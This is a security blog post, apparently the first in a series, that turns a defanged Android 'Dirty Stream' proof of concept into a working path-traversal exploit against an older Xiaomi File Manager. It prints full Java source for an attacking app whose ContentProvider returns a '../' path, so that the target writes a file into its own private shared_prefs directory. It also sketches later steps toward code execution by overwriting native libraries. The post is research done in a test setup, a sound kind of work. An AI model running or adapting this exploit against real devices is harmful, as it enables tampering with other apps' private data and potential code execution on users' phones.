<!DOCTYPE html>
<html lang="en-us">

<head>
    <title>
Dirty Stream: Exploiting Android&#39;s File Sharing - Part 1: The Setup | gelosecurity
</title>

    <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="gelo&#39;s security blog">

<meta name="generator" content="Hugo 0.145.0">


<link rel="canonical" href="https://gelosecurity.github.io/posts/dirty-stream-pt1/" >




<link href="/css/style.min.3651cb95c72ce13c6a5cbb9a059fc4da0014d2580cb70d8f507f4bb73954293a.css" rel="stylesheet">




</head>

<body>

    <div class="flexWrapper">
        <header class="headerWrapper">
    <div class="header">
        <div>
            <a class="terminal" href="/">
                <span>root@gelo.gg ~ $</span>
            </a>
        </div>
        <input class="side-menu" type="checkbox" id="side-menu">
        <label class="hamb" for="side-menu"><span class="hamb-line"></span></label>
        <nav class="headerLinks">
            <ul>
                
                <li>
                    <a href="https://gelosecurity.github.io/about" title="" >
                        ~/about</a>
                </li>
                
                <li>
                    <a href="https://gelosecurity.github.io/posts" title="" >
                        ~/blog</a>
                </li>
                
            </ul>
        </nav>
    </div>
</header>


        <div class="content">
            <main class="main">
                
<div class="postWrapper">
    <h1>Dirty Stream: Exploiting Android&#39;s File Sharing - Part 1: The Setup</h1>
    
    
    <section class="postMetadata">
        <dl>
            
                
<dt>tags</dt>
<dd><span></span>
    <a href="/tags/android/">#Android</a><span></span>
    <a href="/tags/security/">#Security</a><span></span>
    <a href="/tags/vulnerability/">#Vulnerability</a><span></span>
    <a href="/tags/path-traversal/">#Path Traversal</a><span></span>
    <a href="/tags/dirty-stream/">#Dirty Stream</a><span></span>
    <a href="/tags/poc/">#Poc</a><span></span>
    <a href="/tags/file-sharing/">#File Sharing</a><span></span>
    <a href="/tags/content-provider/">#Content Provider</a><span></span>
    <a href="/tags/exploit/">#Exploit</a><span></span>
    <a href="/tags/mobile-security/">#Mobile Security</a><span></span>
    <a href="/tags/owasp-mastg/">#OWASP MASTG</a></dd>
            
            
            
            
                <dt>published</dt>
                
                <dd><time datetime="2024-05-03">May 3, 2024</time></dd>
            
            
                <dt>reading time</dt>
                <dd>7 minutes</dd>
            
        </dl>
    </section>
    
    <div>
        <h2 id="dirty-stream-exploiting-androids-file-sharing---part-1-the-setup">Dirty Stream: Exploiting Android&rsquo;s File Sharing - Part 1: The Setup</h2>
<p>Recently, the security community has been buzzing about a new class of Android vulnerabilities dubbed &ldquo;Dirty Stream&rdquo;. This attack, detailed by <a href="https://www.microsoft.com/en-us/security/blog/2024/05/01/dirty-stream-attack-discovering-and-mitigating-a-common-vulnerability-pattern-in-android-apps/">Microsoft&rsquo;s Threat Intelligence team</a>, highlights a common vulnerability pattern related to improper handling of file sharing via <code>ContentProvider</code>s. I&rsquo;d like to thank <a href="https://x.com/Ch0pin">Ch0pin</a> for their excellent articles, presentations and research on Android security, and to cyb3r-w0lf and LLeavesG for their initial PoC skeletons.</p>
<p>This blog post, the first in a series, will walk you through my journey of understanding and exploiting this vulnerability. We&rsquo;ll start with a &ldquo;defanged&rdquo; proof-of-concept (PoC), debug it, and get it working, demonstrating the core principle of the Dirty Stream attack. Later posts will delve into more advanced exploitation scenarios.</p>
<h3 id="what-is-the-dirty-stream-attack">What is the Dirty Stream Attack?</h3>
<p>The Dirty Stream attack, as documented by Microsoft, exploits path traversal vulnerabilities in Android applications. It targets apps that insecurely handle file sharing through <code>ContentProvider</code>. The attack allows a malicious app to overwrite files in the private data directory of a vulnerable (target) application. This can lead to several severe consequences, including:</p>
<ul>
<li><strong>Arbitrary Code Execution (ACE):</strong> Overwriting shared libraries (.so files).</li>
<li><strong>Data Modification:</strong> Changing application preferences or databases.</li>
<li><strong>Denial of Service:</strong> Corrupting critical files, causing crashes.</li>
</ul>
<p>The attack leverages the way the vulnerable app requests and uses the <em>filename</em> from the attacking app&rsquo;s <code>ContentProvider</code>. The target app doesn&rsquo;t properly sanitize the filename, allowing for path traversal.</p>
<h3 id="the-starting-point-a-defanged-poc">The Starting Point: A Defanged PoC</h3>
<p>I began by exploring existing PoC code. I found a few on GitHub:</p>
<ul>
<li><a href="https://github.com/cyb3r-w0lf/Dirty_Stream-Android-POC">cyb3r-w0lf/Dirty_Stream-Android-POC</a> (Original, defanged)</li>
<li><a href="https://github.com/LLeavesG/Android-DirtyStream">LLeavesG/Android-DirtyStream</a> (Another attempt that didn&rsquo;t work out of the box)</li>
</ul>
<p>My initial goal was to understand how the exploit worked. The original PoC by cyb3r-w0lf was intentionally &ldquo;defanged&rdquo; – it wouldn&rsquo;t <em>actually</em> write to the target&rsquo;s directory. This is good ethical disclosure practice. Later I found a working PoC by gelosecurity:</p>
<ul>
<li><a href="https://github.com/gelosecurity/Dirty_Stream-Android-POC">gelosecurity/Dirty_Stream-Android-POC</a></li>
</ul>
<h3 id="the-test-environment">The Test Environment</h3>
<p>To safely test the exploit, I used the following setup:</p>
<ul>
<li><strong>Development Environment:</strong> Android Studio</li>
<li><strong>Deployment Tool:</strong> adb (Android Debug Bridge)</li>
<li><strong>Target Device:</strong> A rooted Google Pixel 3 running Android 15.0.0 (using Corellium)</li>
<li><strong>Vulnerable App:</strong> I used an older version (V1-210567) of Xiaomi Inc.&rsquo;s File Manager, which is known to be vulnerable.</li>
</ul>
<h3 id="step-1-understanding-the-defanged-code">Step 1: Understanding the Defanged Code</h3>
<p>The original PoC consists of three main Java files:</p>
<ol>
<li>
<p><strong><code>DatabaseHelper.java</code>:</strong> This class extends <code>SQLiteOpenHelper</code> and sets up a SQLite database. It defines a table named <code>exploitTable</code> with columns <code>size</code>, <code>display_name</code>, and <code>_data</code>. The <code>insertExploitData</code> method was <em>supposed</em> to insert a row containing the malicious path (<code>../../../../../../../../../data/data/com.mi.android.globalFileexplorer/shared_prefs/pwned.txt</code>) and some placeholder data. <em>Importantly, the vulnerable app expects the <code>_data</code> and <code>_size</code> columns.</em></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span><span style="color:#f92672">package</span> com.fileexplorer.exploit;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.content.Context;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.database.sqlite.SQLiteDatabase;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.database.sqlite.SQLiteOpenHelper;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.util.Log;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">public</span> <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">DatabaseHelper</span> <span style="color:#66d9ef">extends</span> SQLiteOpenHelper {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">final</span> String DATABASE_NAME <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;exploitDB&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">static</span> <span style="color:#66d9ef">final</span> <span style="color:#66d9ef">int</span> DATABASE_VERSION <span style="color:#f92672">=</span> 1;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#a6e22e">DatabaseHelper</span>(Context context) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">super</span>(context, DATABASE_NAME, <span style="color:#66d9ef">null</span>, DATABASE_VERSION);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">onCreate</span>(SQLiteDatabase db) {
</span></span><span style="display:flex;"><span>        db.<span style="color:#a6e22e">execSQL</span>(<span style="color:#e6db74">&#34;CREATE TABLE IF NOT EXISTS exploitTable (size INTEGER, display_name TEXT, _data TEXT);&#34;</span>);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">onUpgrade</span>(SQLiteDatabase db, <span style="color:#66d9ef">int</span> oldVersion, <span style="color:#66d9ef">int</span> newVersion) {
</span></span><span style="display:flex;"><span>        db.<span style="color:#a6e22e">execSQL</span>(<span style="color:#e6db74">&#34;DROP TABLE IF EXISTS exploitTable&#34;</span>);
</span></span><span style="display:flex;"><span>        onCreate(db);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">insertExploitData</span>() {
</span></span><span style="display:flex;"><span>        SQLiteDatabase db <span style="color:#f92672">=</span> <span style="color:#66d9ef">this</span>.<span style="color:#a6e22e">getWritableDatabase</span>();
</span></span><span style="display:flex;"><span>        db.<span style="color:#a6e22e">execSQL</span>(<span style="color:#e6db74">&#34;INSERT INTO exploitTable (size, display_name, _data) VALUES (12345, &#39;../../../../../../../../../../data/data/com.mi.android.globalFileexplorer/shared_prefs/pwned.txt&#39;, &#39;exploit_data&#39;);&#34;</span>);
</span></span><span style="display:flex;"><span>        Log.<span style="color:#a6e22e">d</span>(<span style="color:#e6db74">&#34;DatabaseHelper&#34;</span>, <span style="color:#e6db74">&#34;Inserted exploit data&#34;</span>);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div></li>
<li>
<p><strong><code>MainActivity.java</code>:</strong> This is the main activity of the exploiting app. The <code>onCreate</code> method sets up a button. When clicked, the <code>setupDatabaseAndIntent</code> method is called. This method:</p>
<ul>
<li>Calls <code>copyFileToInternalStorage()</code> to put a file named <code>pwned.txt</code> in the app&rsquo;s internal storage (used later).</li>
<li>Instantiates <code>DatabaseHelper</code> and calls <code>insertExploitData</code>.</li>
<li>Creates an <code>Intent</code> that targets the vulnerable <code>CopyFileActivity</code> in the Xiaomi File Manager (<code>com.mi.android.globalFileexplorer</code>).</li>
<li>Sets the <code>Intent</code>&rsquo;s data to a <code>content://</code> URI: <code>content://com.fileexplorer.exploit/pwned.txt</code>.</li>
<li>Starts the activity.</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span><span style="color:#f92672">package</span> com.fileexplorer.exploit;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.content.ComponentName;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.content.Intent;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.net.Uri;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.os.Bundle;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> androidx.appcompat.app.AppCompatActivity;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.util.Log;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.widget.Button;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> java.io.File;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> java.io.FileOutputStream;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> java.io.IOException;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> java.io.InputStream;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">public</span> <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">MainActivity</span> <span style="color:#66d9ef">extends</span> AppCompatActivity {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">protected</span> <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">onCreate</span>(Bundle savedInstanceState) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">super</span>.<span style="color:#a6e22e">onCreate</span>(savedInstanceState);
</span></span><span style="display:flex;"><span>        setContentView(R.<span style="color:#a6e22e">layout</span>.<span style="color:#a6e22e">activity_main</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        Button button <span style="color:#f92672">=</span> findViewById(R.<span style="color:#a6e22e">id</span>.<span style="color:#a6e22e">exploit</span>);
</span></span><span style="display:flex;"><span>        button.<span style="color:#a6e22e">setOnClickListener</span>(view <span style="color:#f92672">-&gt;</span> setupDatabaseAndIntent());
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">setupDatabaseAndIntent</span>() {
</span></span><span style="display:flex;"><span>        copyFileToInternalStorage();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        DatabaseHelper dbHelper <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> DatabaseHelper(<span style="color:#66d9ef">this</span>);
</span></span><span style="display:flex;"><span>        dbHelper.<span style="color:#a6e22e">insertExploitData</span>();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        Uri uri <span style="color:#f92672">=</span> Uri.<span style="color:#a6e22e">parse</span>(<span style="color:#e6db74">&#34;content://com.fileexplorer.exploit/pwned.txt&#34;</span>);
</span></span><span style="display:flex;"><span>        Intent intent <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> Intent();
</span></span><span style="display:flex;"><span>        intent.<span style="color:#a6e22e">setComponent</span>(<span style="color:#66d9ef">new</span> ComponentName(<span style="color:#e6db74">&#34;com.mi.android.globalFileexplorer&#34;</span>, <span style="color:#e6db74">&#34;com.android.fileexplorer.activity.CopyFileActivity&#34;</span>));
</span></span><span style="display:flex;"><span>        intent.<span style="color:#a6e22e">putExtra</span>(<span style="color:#e6db74">&#34;from_private&#34;</span>, <span style="color:#66d9ef">true</span>);
</span></span><span style="display:flex;"><span>        intent.<span style="color:#a6e22e">putExtra</span>(<span style="color:#e6db74">&#34;inner_call&#34;</span>, <span style="color:#66d9ef">true</span>);
</span></span><span style="display:flex;"><span>        intent.<span style="color:#a6e22e">putExtra</span>(<span style="color:#e6db74">&#34;explorer_path&#34;</span>, <span style="color:#e6db74">&#34;content://com.fileexplorer.exploit/pwned.txt&#34;</span>);
</span></span><span style="display:flex;"><span>        intent.<span style="color:#a6e22e">setData</span>(uri);
</span></span><span style="display:flex;"><span>        intent.<span style="color:#a6e22e">setAction</span>(Intent.<span style="color:#a6e22e">ACTION_SEND</span>);
</span></span><span style="display:flex;"><span>        startActivity(intent);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">copyFileToInternalStorage</span>() {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">try</span> {
</span></span><span style="display:flex;"><span><span style="color:#75715e">//          InputStream inputStream = getResources().openRawResource(R.raw.pwned); //get from res directory</span>
</span></span><span style="display:flex;"><span>            InputStream inputStream <span style="color:#f92672">=</span> getAssets().<span style="color:#a6e22e">open</span>(<span style="color:#e6db74">&#34;pwned.txt&#34;</span>); <span style="color:#75715e">//get from assets directory</span>
</span></span><span style="display:flex;"><span>            File outFile <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> File(getFilesDir(), <span style="color:#e6db74">&#34;pwned.txt&#34;</span>);
</span></span><span style="display:flex;"><span>            FileOutputStream outputStream <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> FileOutputStream(outFile);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">byte</span><span style="color:#f92672">[]</span> buffer <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#66d9ef">byte</span><span style="color:#f92672">[</span>1024<span style="color:#f92672">]</span>;
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">int</span> length;
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">while</span> ((length <span style="color:#f92672">=</span> inputStream.<span style="color:#a6e22e">read</span>(buffer)) <span style="color:#f92672">&gt;</span> 0) {
</span></span><span style="display:flex;"><span>                outputStream.<span style="color:#a6e22e">write</span>(buffer, 0, length);
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>            outputStream.<span style="color:#a6e22e">close</span>();
</span></span><span style="display:flex;"><span>            inputStream.<span style="color:#a6e22e">close</span>();
</span></span><span style="display:flex;"><span>        } <span style="color:#66d9ef">catch</span> (IOException e) {
</span></span><span style="display:flex;"><span>            Log.<span style="color:#a6e22e">e</span>(<span style="color:#e6db74">&#34;MainActivity&#34;</span>, <span style="color:#e6db74">&#34;Error copying file to internal storage&#34;</span>, e);
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div></li>
<li>
<p><strong><code>MyContentProvider.java</code>:</strong> This class extends <code>ContentProvider</code>. The key method here is <code>openFile</code>. This is where the vulnerability <em>should</em> be triggered. The original, defanged code simply opens the file <code>pwned.txt</code> from the app&rsquo;s <em>own</em> internal storage, regardless of the URI requested. The critical <code>query</code> method, which <em>should</em> have provided the malicious path, simply returns <code>null</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span><span style="color:#f92672">package</span> com.fileexplorer.exploit;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.content.ContentProvider;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.content.ContentValues;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.database.Cursor;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.database.sqlite.SQLiteDatabase;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.net.Uri;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.os.ParcelFileDescriptor;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> android.util.Log;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> java.io.File;
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> java.io.FileNotFoundException;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">public</span> <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">MyContentProvider</span> <span style="color:#66d9ef">extends</span> ContentProvider {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">private</span> DatabaseHelper dbHelper;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">boolean</span> <span style="color:#a6e22e">onCreate</span>() {
</span></span><span style="display:flex;"><span>        dbHelper <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> DatabaseHelper(getContext());
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">true</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> ParcelFileDescriptor <span style="color:#a6e22e">openFile</span>(Uri uri, String mode) <span style="color:#66d9ef">throws</span> FileNotFoundException {
</span></span><span style="display:flex;"><span>        File file <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> File(getContext().<span style="color:#a6e22e">getFilesDir</span>(), <span style="color:#e6db74">&#34;pwned.txt&#34;</span>);
</span></span><span style="display:flex;"><span>        Log.<span style="color:#a6e22e">d</span>(<span style="color:#e6db74">&#34;MyContentProvider&#34;</span>, <span style="color:#e6db74">&#34;File path: &#34;</span> <span style="color:#f92672">+</span> file.<span style="color:#a6e22e">getAbsolutePath</span>());
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>file.<span style="color:#a6e22e">exists</span>()) {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">throw</span> <span style="color:#66d9ef">new</span> FileNotFoundException(<span style="color:#e6db74">&#34;File not found: &#34;</span> <span style="color:#f92672">+</span> file.<span style="color:#a6e22e">getAbsolutePath</span>());
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> ParcelFileDescriptor.<span style="color:#a6e22e">open</span>(file, ParcelFileDescriptor.<span style="color:#a6e22e">MODE_READ_ONLY</span>);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> Cursor <span style="color:#a6e22e">query</span>(Uri uri, String<span style="color:#f92672">[]</span> projection, String selection, String<span style="color:#f92672">[]</span> selectionArgs, String sortOrder) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">null</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> String <span style="color:#a6e22e">getType</span>(Uri uri) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">null</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> Uri <span style="color:#a6e22e">insert</span>(Uri uri, ContentValues values) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">null</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">int</span> <span style="color:#a6e22e">delete</span>(Uri uri, String selection, String<span style="color:#f92672">[]</span> selectionArgs) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> 0;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">int</span> <span style="color:#a6e22e">update</span>(Uri uri, ContentValues values, String selection, String<span style="color:#f92672">[]</span> selectionArgs) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> 0;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div></li>
</ol>
<h3 id="step-2-debugging-and-logging">Step 2: Debugging and Logging</h3>
<p>The first thing I did was add extensive logging throughout the code using <code>Log.d()</code>. I wanted to see exactly what each method was doing, what values were being passed, and where execution was failing.</p>
<h3 id="step-3-initial-run-and-failure">Step 3: Initial Run and Failure</h3>
<p>I built and installed the APK on a Corellium virtual device running a rooted Android 15.0.0. I then launched the app and clicked the &ldquo;Exploit&rdquo; button. As expected (with the defanged code), nothing happened. The file <code>pwned.txt</code> was <em>not</em> written to the target directory in the File Manager&rsquo;s private data directory.</p>
<h3 id="step-4-fixing-the-contentprovider">Step 4: Fixing the <code>ContentProvider</code></h3>
<p>The core issue was in <code>MyContentProvider</code>. The <code>query</code> method, which should return a <code>Cursor</code> containing the malicious path, was simply returning <code>null</code>. The vulnerable File Manager app likely uses the <code>_data</code> and <code>_size</code> columns from this <code>Cursor</code> to determine where to write the file and its expected size.</p>
<p>Here&rsquo;s the corrected <code>query</code> method in <code>MyContentProvider.java</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span>    <span style="color:#a6e22e">@Override</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> Cursor <span style="color:#a6e22e">query</span>(Uri uri, String<span style="color:#f92672">[]</span> projection, String selection,
</span></span><span style="display:flex;"><span>                        String<span style="color:#f92672">[]</span> selectionArgs, String sortOrder) {
</span></span><span style="display:flex;"><span>        SQLiteDatabase db <span style="color:#f92672">=</span> dbHelper.<span style="color:#a6e22e">getReadableDatabase</span>();
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">// Return the malicious path from the row you inserted</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> db.<span style="color:#a6e22e">rawQuery</span>(
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;SELECT display_name AS _display_name, _data, size AS _size FROM exploitTable LIMIT 1&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>        );
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>The query method now retrieves the malicious file path from the exploitTable in the database and returns a Cursor. The target file manager app expects specific columns (_display_name, _data, and _size) in the result, so those are provided using aliases in the SQL query.</p>
<h3 id="step-5-success">Step 5: Success!</h3>
<p>After rebuilding and reinstalling the modified app, clicking the &ldquo;Exploit&rdquo; button <em>did</em> successfully write the <code>pwned.txt</code> file to the target directory (<code>/data/data/com.mi.android.globalFileexplorer/shared_prefs/</code>). This confirmed the core path traversal vulnerability.</p>
<p>&lt;GIF/video placeholder showing the exploit working&gt;</p>
<h3 id="next-steps">Next Steps</h3>
<p>This first part focused on getting a basic file write working. However, a real &ldquo;Dirty Stream&rdquo; attack involves more than just writing a harmless text file. The next steps, which I&rsquo;ll cover in future blog posts, include:</p>
<ol>
<li>
<p><strong>Overwriting Sensitive Files:</strong> Instead of <code>pwned.txt</code>, we&rsquo;ll target files like shared libraries (<code>.so</code> files) or configuration files (e.g., <code>.xml</code> files in the <code>shared_prefs</code> directory) to achieve a more significant impact. We could also target database files. The goal is to find a file that, when overwritten, gives us either control over data the app uses or, ideally, code execution.</p>
</li>
<li>
<p><strong>Code Execution:</strong> By overwriting an <code>.so</code> file (native library), we can potentially achieve arbitrary code execution in the context of the vulnerable app. This is a common and high-impact outcome. We will investigate how the target app loads native libraries and which ones are suitable for replacement.</p>
</li>
</ol>

    </div>
</div>

            </main>
        </div>


        <footer class="footer">
    
        <span>
            © 2025 gelosecurity, Built with
            <a href="https://gohugo.io" class="footerLink">Hugo</a> and
            <a href="https://github.com/LordMathis/hugo-theme-nightfall" class="footerLink">Nightfall</a> theme
        </span>
    
</footer>
    </div>

</body>

</html>